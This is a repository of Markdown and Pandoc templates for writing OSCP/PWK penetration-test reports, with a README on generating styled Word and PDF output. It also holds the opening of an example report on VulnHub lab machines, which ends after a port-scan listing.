├── custom-reference.docx ├── Examples ├── Example Report.pdf ├── Example Report.docx ├── _resources │ ├── 0089524c21be445299eeb07d21069283.png │ ├── 158fecfa36214df8b5c347483a9c4cec.png │ ├── 1d0f9156e6ad477da9dafc9eb736b5f4.png │ ├── 2e4416476b68490a8d24e3d7ef51433f.png │ ├── 3fcfd682f31f487fa15a1e936f6d54e4.png │ ├── 43674b8c9f7f41ea8785d605952406e6.png │ ├── 4a37b0a8091645d7a6b5ebfb1b94710b.png │ ├── 4febeff1e4004089a5034bedfe14517d.png │ ├── 5aaf06cbb9f34198ade6738ce59f6c87.png │ ├── 74774e33076e4483ac3e35d52b3de13b.png │ ├── 78f9b63a3ff44b8dbddeb34bb174f469.png │ ├── 78fa26ae3e3249a3957c46f2c205d667.png │ ├── 7bafa472ec614deabdd9cfca82d1119e.png │ ├── 8b57d11edb854ab1af23239e63b089ef.png │ ├── ab39cd6410114eae9114e8c1aeca9a64.png │ ├── bd626d2837644bc5908d1a10c044bc61.png │ ├── cdaf8cd804cf4f6bbb77f0d6f8362f2c.png │ ├── d77016f6a7eb4770a8c82f92392d9ef7.png │ ├── d980375a0a284cd699d453a2bb24acbb.png │ ├── dc7495e481304f8991d3f2b205ed49f3.png │ ├── dedb017ab57246aab374a65165e16d64.png │ ├── e054884fa6084498bc1ab532725145a5.png │ ├── e6f2888300044268a027062aa4973311.png │ └── e8fa6ab4d5a54bcf8209512d0a54b78c.png └── Example Report _ No Styling.md ├── _resources └── GeneratingReport.png ├── Machine template.md ├── README.md ├── Exam Report template.md └── Lab Report template.md /custom-reference.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/custom-reference.docx -------------------------------------------------------------------------------- /Examples/Example Report.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/Example Report.pdf -------------------------------------------------------------------------------- /Examples/Example Report.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/Example Report.docx -------------------------------------------------------------------------------- /_resources/GeneratingReport.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/_resources/GeneratingReport.png -------------------------------------------------------------------------------- /Examples/_resources/0089524c21be445299eeb07d21069283.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/0089524c21be445299eeb07d21069283.png -------------------------------------------------------------------------------- /Examples/_resources/158fecfa36214df8b5c347483a9c4cec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/158fecfa36214df8b5c347483a9c4cec.png -------------------------------------------------------------------------------- /Examples/_resources/1d0f9156e6ad477da9dafc9eb736b5f4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/1d0f9156e6ad477da9dafc9eb736b5f4.png -------------------------------------------------------------------------------- /Examples/_resources/2e4416476b68490a8d24e3d7ef51433f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/2e4416476b68490a8d24e3d7ef51433f.png -------------------------------------------------------------------------------- /Examples/_resources/3fcfd682f31f487fa15a1e936f6d54e4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/3fcfd682f31f487fa15a1e936f6d54e4.png -------------------------------------------------------------------------------- /Examples/_resources/43674b8c9f7f41ea8785d605952406e6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/43674b8c9f7f41ea8785d605952406e6.png -------------------------------------------------------------------------------- /Examples/_resources/4a37b0a8091645d7a6b5ebfb1b94710b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/4a37b0a8091645d7a6b5ebfb1b94710b.png -------------------------------------------------------------------------------- /Examples/_resources/4febeff1e4004089a5034bedfe14517d.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/4febeff1e4004089a5034bedfe14517d.png -------------------------------------------------------------------------------- /Examples/_resources/5aaf06cbb9f34198ade6738ce59f6c87.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/5aaf06cbb9f34198ade6738ce59f6c87.png -------------------------------------------------------------------------------- /Examples/_resources/74774e33076e4483ac3e35d52b3de13b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/74774e33076e4483ac3e35d52b3de13b.png -------------------------------------------------------------------------------- /Examples/_resources/78f9b63a3ff44b8dbddeb34bb174f469.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/78f9b63a3ff44b8dbddeb34bb174f469.png -------------------------------------------------------------------------------- /Examples/_resources/78fa26ae3e3249a3957c46f2c205d667.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/78fa26ae3e3249a3957c46f2c205d667.png -------------------------------------------------------------------------------- /Examples/_resources/7bafa472ec614deabdd9cfca82d1119e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/7bafa472ec614deabdd9cfca82d1119e.png -------------------------------------------------------------------------------- /Examples/_resources/8b57d11edb854ab1af23239e63b089ef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/8b57d11edb854ab1af23239e63b089ef.png -------------------------------------------------------------------------------- /Examples/_resources/ab39cd6410114eae9114e8c1aeca9a64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/ab39cd6410114eae9114e8c1aeca9a64.png -------------------------------------------------------------------------------- /Examples/_resources/bd626d2837644bc5908d1a10c044bc61.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/bd626d2837644bc5908d1a10c044bc61.png -------------------------------------------------------------------------------- /Examples/_resources/cdaf8cd804cf4f6bbb77f0d6f8362f2c.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/cdaf8cd804cf4f6bbb77f0d6f8362f2c.png -------------------------------------------------------------------------------- /Examples/_resources/d77016f6a7eb4770a8c82f92392d9ef7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/d77016f6a7eb4770a8c82f92392d9ef7.png -------------------------------------------------------------------------------- /Examples/_resources/d980375a0a284cd699d453a2bb24acbb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/d980375a0a284cd699d453a2bb24acbb.png -------------------------------------------------------------------------------- /Examples/_resources/dc7495e481304f8991d3f2b205ed49f3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/dc7495e481304f8991d3f2b205ed49f3.png -------------------------------------------------------------------------------- /Examples/_resources/dedb017ab57246aab374a65165e16d64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/dedb017ab57246aab374a65165e16d64.png -------------------------------------------------------------------------------- /Examples/_resources/e054884fa6084498bc1ab532725145a5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/e054884fa6084498bc1ab532725145a5.png -------------------------------------------------------------------------------- /Examples/_resources/e6f2888300044268a027062aa4973311.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/e6f2888300044268a027062aa4973311.png -------------------------------------------------------------------------------- /Examples/_resources/e8fa6ab4d5a54bcf8209512d0a54b78c.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/chvancooten/OSCP-MarkdownReportingTemplates/HEAD/Examples/_resources/e8fa6ab4d5a54bcf8209512d0a54b78c.png -------------------------------------------------------------------------------- /Machine template.md: -------------------------------------------------------------------------------- 1 | ## System IP XXX.XXX.XXX.XXX (HOSTNAME) 2 | 3 | ### System overview 4 | 5 | | | | 6 | |-------------------|-----------------| 7 | | IP Address | 192.168.255.255 | 8 | | Hostname | ExampleName | 9 | | Exploitation Date | 99-99-9999 | 10 | | Point Value | 25 | 11 | 12 | ### Exploitation Overview 13 | 14 | 15 | 16 | ### Service Enumeration 17 | 18 | #### Portscan - TCP 19 | 20 | ```plaintext 21 | 22 | ``` 23 | 24 | #### Portscan - UDP 25 | 26 | ```plaintext 27 | 28 | ``` 29 | 30 | ### Network interfaces 31 | 32 | ```plaintext 33 | 34 | ``` 35 | 36 | ### Credentials 37 | 38 | ```plaintext 39 | 40 | ``` 41 | 42 | ### Exploitation and proof 43 | 44 | #### Initial access 45 | 46 | ##### Vulnerability exploitation 47 | 48 | ##### Severity 49 | 50 | ##### Remediation 51 | 52 | ##### Proof 53 | 54 | #### Privilege Escalation 55 | 56 | ##### Vulnerability exploitation 57 | 58 | ##### Severity 59 | 60 | ##### Remediation 61 | 62 | ##### Proof 63 | 64 | ### Miscellaneous notes 65 | 66 | 67 | ### Reporting checklist 68 | 69 | - [ ] Are screenshots of the proof files together with `ipconfig/ifconfig/ip a` included? 70 | - [ ] Is all *modified* source code included? 71 | - [ ] Are all relevant exploits referenced? 72 | - [ ] Are all steps reproducible? -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP / PWK Markdown Reporting Templates and Pandoc Reference Style 2 | 3 | I wrote [a blog post](https://casvancooten.com/posts/2020/05/generating-pretty-pwk-reports-with-pandoc-and-markdown-templates-inside/) on how to use these templates to easily generate pretty reports with little effort. 4 | 5 | This repo contains the templates I used for OSCP / PWK lab and exam reporting, as well as the basic styles I used to convert the markdown report to a (relatively) slick-looking and organized report, while preserving code formatting and syntax highlighting. To achieve this I generate the PDF based on an intermediary Word file generated through Pandoc. 6 | 7 | The repo also contains some [examples](https://github.com/chvancooten/OSCP-MarkdownReportingTemplates/tree/master/Examples) to show what a report may come to look like. Note that the final conversion to Word from PDF does require some manual styling work (which is actually what I personally preferred). Since I obviously cannot disclose any PWK lab or exam writeups, I've used some VulnHub writeups as filler instead. Don't open the example report if you don't want spoilers for `Brainpan`, `Kioptrix2014`, `Zico`, or `LazyAdmin`. 🙃 8 | 9 | ## Requirements 10 | 11 | - A Markdown editor of your choosing 12 | - [Pandoc](https://pandoc.org/) 13 | - `1337 hacking skillz` 14 | 15 | ## How to use 16 | 17 | ### Preparing markdown report 18 | 19 | The markdown templates are fairly straightforward. I strongly recommend using a Markdown editor that has decent backup / synchronization features as well as a feature to copy and paste screenshots (must-have IMO). I used [Joplin](https://joplinapp.org/) as a daily editor, and [VS Code](https://code.visualstudio.com/docs/languages/markdown) to compile and streamline the final report. 20 | 21 | While doing the labs or exam, I would recommend keeping separate write-ups per machine, based on the template you aim to use for reporting. Once you are happy with your separate machine write-ups and ready to compile them into a report, export your markdown files (if needed) and ensure that all the images are intact. Then, compile a master document with an appropriate introduction to, and summary of, your work. For this I have included the Lab and Exam Report templates, which are based on OffSec's own reporting templates. 22 | 23 | ### Preparing `reference.docx` for custom styling (optional) 24 | 25 | The `reference.docx` file determines the basic styling of your intermediate Word document. I have included an example file which covers all the styles, but you can generate and adapt your own if you want. 26 | 27 | You can export a reference file as follows: 28 | 29 | ``` 30 | pandoc --print-default-data-file reference.docx > custom-reference.docx 31 | ``` 32 | 33 | Edit the styles embedded in the document as desired to determine how Pandoc will generate your report. 34 | 35 | > Don't overlook the many important styles (such as "source code") that are hidden, you can see the full overview by clicking the "box-with-arrow" on the bottom right of the styling section in Word, and edit the styles from there. 36 | 37 | ### Generating intermediate .docx report 38 | 39 | To maintain full control of the output report, I worked with an intermediate report in Word format. You can generate this report as follows. [This article](https://www.garrickadenbuie.com/blog/pandoc-syntax-highlighting-examples/) has a nice and visual representation of the different syntax highlighting styles that Pandoc offer by default. 40 | 41 | ``` 42 | pandoc "Example Report _ No Styling.md" -o output.docx --highlight-style=tango --reference-doc=./custom-reference.docx 43 | ``` 44 | 45 | ![Generating the docx report](./_resources/GeneratingReport.png) 46 | 47 | ### Finalizing the report 48 | 49 | The pandoc reference document covers a lot of the styling, but not everything that I wanted it to. As such, I adapted the following manually to ensure that the output document is nice and sleek: 50 | 51 | - Title page formatting 52 | - Table of contents 53 | - Page numbering 54 | - Image Sizes 55 | - Since Pandoc renders images at page width by default, some images come out really big depending on the aspect ratio of the original image. This could be solved by using something like `![my caption](./figures/myimage.png){ width=250px }` in your original MarkDown file, but I prefer going through to manually resize images to the right size. 56 | 57 | Of course, this is up to your preference! At this point you can tweak your styles or formatting as you desire. 58 | 59 | ### Exporting PDF 60 | 61 | OffSec expects your report in PDF format. Generating that from Word shouldn't be much of a hurdle though. ;) 62 | -------------------------------------------------------------------------------- /Exam Report template.md: -------------------------------------------------------------------------------- 1 | # Offensive Security - Penetration Test Report for OSCP Exam 2 | 3 | 4 | [email@email.email] 5 | OSID: [OS-XXXXX] 6 | [Date] 7 | 8 | # Table of Contents 9 | 10 | # Outline 11 | 12 | ## Introduction 13 | 14 | The Offensive Security Lab penetration test report contains all efforts that were conducted in order to pass the Offensive Security OSCP Certification Exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the Exam Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional. 15 | 16 | ## Objective 17 | 18 | The objective of this assessment is to perform an internal penetration test against the Offensive Security Exam network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. 19 | 20 | ## Requirements 21 | 22 | The student will be required to fill out this penetration testing report fully and to include the following sections: 23 | 24 | - Overall High-Level Summary and Recommendations (non-technical) 25 | - Methodology walkthrough and detailed outline of steps taken 26 | - Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable 27 | - Any additional items that were not included 28 | 29 | # High-Level Summary 30 | 31 | The author of this report was tasked with performing an internal penetration test towards the Offensive Security Exam Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate Offensive Security’s internal Exam Lab systems. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting findings back to Offensive Security. 32 | 33 | 34 | During the assessment, several alarming vulnerabilities were identified on Offensive Security’s exam network. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, XXXXXXX systems were succesfully compromised, granting full control over every system in the network. These systems, as well as a brief description on how access was obtained, are listed in the section below. 35 | 36 | ## Overview of Compromised Machines 37 | 38 | It should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters. 39 | 40 | 41 | - **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY 42 | - **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY 43 | - **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY 44 | - **X.X.X.X (Hostname)** - *Xpts* - VULNERABILITY SUMMARY 45 | - **X.X.X.X (Hostname)** - *Xpts* - Remote (Custom) Buffer Overflow 46 | 47 | ## Recommendations 48 | 49 | It is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each identified vulnerability, patching recommendations are provided in the following chapters. 50 | 51 | One thing to note is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date. 52 | 53 | # Methodologies 54 | 55 | A widely adopted approach to performing penetration testing was utilized during the tests to test how well the Offensive Security Lab environments are secured. In this chapter, a breakdown of of the used methodology is provided. 56 | 57 | ## Information Gathering 58 | 59 | The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. One IP range was in scope: 60 | 61 | 62 | - IP RANGE (X.X.X.X) 63 | 64 | As part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services. 65 | 66 | ## Penetration 67 | 68 | The penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **[X]** out of **5** systems were succesfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities. 69 | 70 | 71 | It should be noted that the Metasploit Framework was utilised for one box during the execution of these tests. The IP address chosen for Metasploit usage was **[XXX.XXX.XXX.XXX]**. 72 | 73 | ## Maintaining Access 74 | 75 | Maintaining access to a system is important to attackers, ensuring that access to a system can be regained after it has been exploited is invaluable. 76 | The 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable. 77 | 78 | ## Lateral Movement 79 | 80 | As part of the engagement, exploitation in closed subnets was requested by Offensive Security, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix. 81 | 82 | ## House Cleaning 83 | 84 | The 'house cleaning' portions of the assessment ensures that remnants of the penetration test are removed. 85 | Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. 86 | Ensuring that no remnants of our penetration test are left over is important. 87 | 88 | After all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. Offensive Security should not have to remove any additional backdoors, user accounts, or files from the system. 89 | 90 | # Exploitation Details 91 | 92 | -------------------------------------------------------------------------------- /Lab Report template.md: -------------------------------------------------------------------------------- 1 | # Offensive Security - Penetration Test Report for PWK Internal Labs 2 | 3 | 4 | [email@email.email] 5 | OSID: [OS-XXXXX] 6 | [Date] 7 | 8 | # Outline 9 | ## Introduction 10 | 11 | The Offensive Security Lab penetration test report contains all efforts that were conducted in order to pass the Offensive Security Lab. This report will be graded from a standpoint of correctness and fullness to all aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional. 12 | 13 | ## Objective 14 | 15 | The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting. 16 | 17 | ## Requirements 18 | 19 | The student will be required to fill out this penetration testing report fully and to include the following sections: 20 | 21 | - Overall High-Level Summary and Recommendations (non-technical) 22 | - Methodology walkthrough and detailed outline of steps taken 23 | - Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable 24 | - Any additional items that were not included 25 | 26 | # High-Level Summary 27 | 28 | The author of this report was tasked with performing an internal penetration test towards the Offensive Security Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate Offensive Security’s internal Lab systems – including but not limited to the THINC.local domain. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting findings back to Offensive Security. 29 | 30 | During the assessment, several alarming vulnerabilities were identified on Offensive Security’s networks. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, all systems were succesfully compromised, granting full control over every system in the network. These systems, as well as a brief description on how access was obtained, are listed in the section below. 31 | 32 | ## Overview of Compromised Machines 33 | 34 | It should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters. 35 | 36 | 37 | **Public Subnet** 38 | 39 | - X.X.X.X (Hostname) - Initial Vulnerability 40 | 41 | **Other Subnet** 42 | 43 | - X.X.X.X (Hostname) - Initial Vulnerability 44 | 45 | **Other Subnet** 46 | 47 | - X.X.X.X (Hostname) - Initial Vulnerability 48 | 49 | **Other Subnet** 50 | 51 | - X.X.X.X (Hostname) - Initial Vulnerability 52 | 53 | ## Recommendations 54 | 55 | It is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each application, patching recommendations are provided. 56 | 57 | One thing to note is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date. 58 | 59 | # Methodologies 60 | 61 | A widely adopted approach to performing penetration testing was utilized during the tests to test how well the Offensive Security Lab environments are secured. 62 | Below, a breakdown of the applied methodology is provided. 63 | 64 | ## Information Gathering 65 | 66 | The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. Three IP ranges were in scope: 67 | 68 | 69 | - The 'Public' subnet: X.X.X.X/24 70 | - Another subnet: X.X.X.X/24 71 | 72 | As part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services. 73 | 74 | ## Penetration 75 | 76 | 77 | The penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **[X]** out of **67** systems were succesfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities. 78 | 79 | ## Maintaining Access 80 | 81 | Maintaining access to a system is important to attackers, ensuring that access to a system can be regained after it has been exploited is invaluable. 82 | The 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable. 83 | 84 | ## Lateral Movement 85 | 86 | As part of the engagement, exploitation in closed subnets was requested by Offensive Security, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix. 87 | 88 | ## House Cleaning 89 | 90 | The 'house cleaning' portions of the assessment ensures that remnants of the penetration test are removed. 91 | Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. 92 | Ensuring that no remnants of our penetration test are left over is important. 93 | 94 | After all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. Offensive Security should not have to remove any additional backdoors, user accounts, or files from the system. 95 | 96 | # Exploitation Details: Public Subnet (X.X.X.X/24) 97 | 98 | 99 | 100 | # Exploitation Details: Public Subnet (X.X.X.X/24) 101 | 102 | 103 | 104 | # Appendix A - Lab Exercises 105 | 106 | 107 | 108 | # Appendix B - Compromised Credentials 109 | 110 | As part of the engagement, several sets of credentials were found on compromised machines. Some credentials were found in hashed form and cracked, indicating the weakness of these credentials. For the sake of full disclosure, these credentials are disclosed below. Note that they should be rotated as soon as possible. 111 | 112 | ## Personal accounts 113 | ```plaintext 114 | CREDENTIALS:HERE 115 | ``` 116 | 117 | ## Non-personal accounts 118 | ```plaintext 119 | CREDENTIALS:HERE 120 | ``` -------------------------------------------------------------------------------- /Examples/Example Report _ No Styling.md: -------------------------------------------------------------------------------- 1 | # Example Report - Penetration Test Report for VulnHub Internal Labs 2 | 3 | me@localhost 4 | 5 | SOME-1D3NT1F13R 6 | 7 | Today 8 | 9 | # Outline 10 | ## Introduction 11 | 12 | The Example Lab penetration test report contains all efforts that were conducted in order to pass The Example Lab. This report will be graded from a standpoint of correctness and fullness to all aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as technical knowledge. 13 | 14 | ## Objective 15 | 16 | The objective of this assessment is to perform an internal penetration test against the Example Lab network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting. 17 | 18 | ## Requirements 19 | 20 | The student will be required to fill out this penetration testing report fully and to include the following sections: 21 | 22 | - Overall High-Level Summary and Recommendations (non-technical) 23 | - Methodology walkthrough and detailed outline of steps taken 24 | - Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable 25 | - Any additional items that were not included 26 | 27 | # High-Level Summary 28 | 29 | The author of this report was tasked with performing an internal penetration test towards The Example Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate internal Lab systems – including but not limited to the internal domain. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting back findings. 30 | 31 | During the assessment, several alarming vulnerabilities were identified on internal networks. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, all systems were succesfully compromised, granting full control over every system in the network. These systems, as well as a brief description on how access was obtained, are listed in the section below. 32 | 33 | ## Overview of Compromised Machines 34 | 35 | It should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters. 36 | 37 | - 10.0.0.138 (BrainPan) - Buffer Overflow 38 | - 10.0.0.139 (Kioptrix2014) - Local File Inclusion and remote code execution 39 | - 10.0.100.105 (Zico) - Default credentials and arbitrary file write 40 | - 10.0.100.107 (LazyAdmin) - Misconfigured SMB share and weak credentials 41 | 42 | ## Recommendations 43 | 44 | It is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each application, patching recommendations are provided. 45 | 46 | One thing to note is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date. 47 | 48 | # Methodologies 49 | 50 | A widely adopted approach to performing penetration testing was utilized during the tests to test how well The Example Lab environments are secured. 51 | Below, a breakdown of the applied methodology is provided. 52 | 53 | ## Information Gathering 54 | 55 | The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. One IP range is in scope: 56 | 57 | - The 'internal' subnet: 10.0.0.0/16 58 | 59 | As part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services. 60 | 61 | ## Penetration 62 | 63 | The penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **4** out of **4** systems were succesfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities. 64 | 65 | ## Maintaining Access 66 | 67 | Maintaining access to a system is important to attackers, ensuring that access to a system can be regained after it has been exploited is invaluable. 68 | The 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable. 69 | 70 | ## Lateral Movement 71 | 72 | As part of the engagement, exploitation in closed subnets was requested, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix. 73 | 74 | ## House Cleaning 75 | 76 | The 'house cleaning' portions of the assessment ensures that remnants of the penetration test are removed. 77 | Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. 78 | Ensuring that no remnants of our penetration test are left over is important. 79 | 80 | After all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. No additional cleanup should be required. 81 | 82 | # Exploitation Details: Internal Subnet (10.0.0.0/16) 83 | 84 | ## System IP 10.0.0.138 (Brainpan) 85 | 86 | ### System overview 87 | 88 | | | | 89 | |-------------------|-----------------| 90 | | IP Address | 10.0.0.138 | 91 | | Hostname | Brainpan | 92 | | Exploitation Date | 04-05-2020 | 93 | | Point Value | N/A | 94 | 95 | ### Exploitation Overview 96 | 97 | To exploit Brainpan, a buffer overflow exploit was developed based on a binary that was disclosed via the web server. Once we successfully developed an exploit for the program on our test server, we succesfully use it to gain a shell on the target system. We break out of the virtual Windows environment and exploit a `sudo` binary to gain command execution as root. 98 | 99 | ### Service Enumeration 100 | 101 | #### Portscan - TCP 102 | 103 | ```plaintext 104 | PORT STATE SERVICE REASON VERSION 105 | 9999/tcp open abyss? syn-ack 106 | | fingerprint-strings: 107 | | NULL: 108 | | _| _| 109 | | _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| 110 | | _|_| _| _| _| _| _| _| _| _| _| _| _| 111 | | _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _| 112 | | [________________________ WELCOME TO BRAINPAN _________________________] 113 | |_ ENTER THE PASSWORD 114 | 10000/tcp open http syn-ack SimpleHTTPServer 0.6 (Python 2.7.3) 115 | |_http-server-header: SimpleHTTP/0.6 Python/2.7.3 116 | |_http-title: Site doesn't have a title (text/html). 117 | 1 service unrecognized despite returning data. 118 | ``` 119 | 120 | ### Network interfaces 121 | 122 | ```plaintext 123 | 1: lo: mtu 16436 qdisc noqueue state UNKNOWN 124 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 125 | inet 127.0.0.1/8 scope host lo 126 | inet6 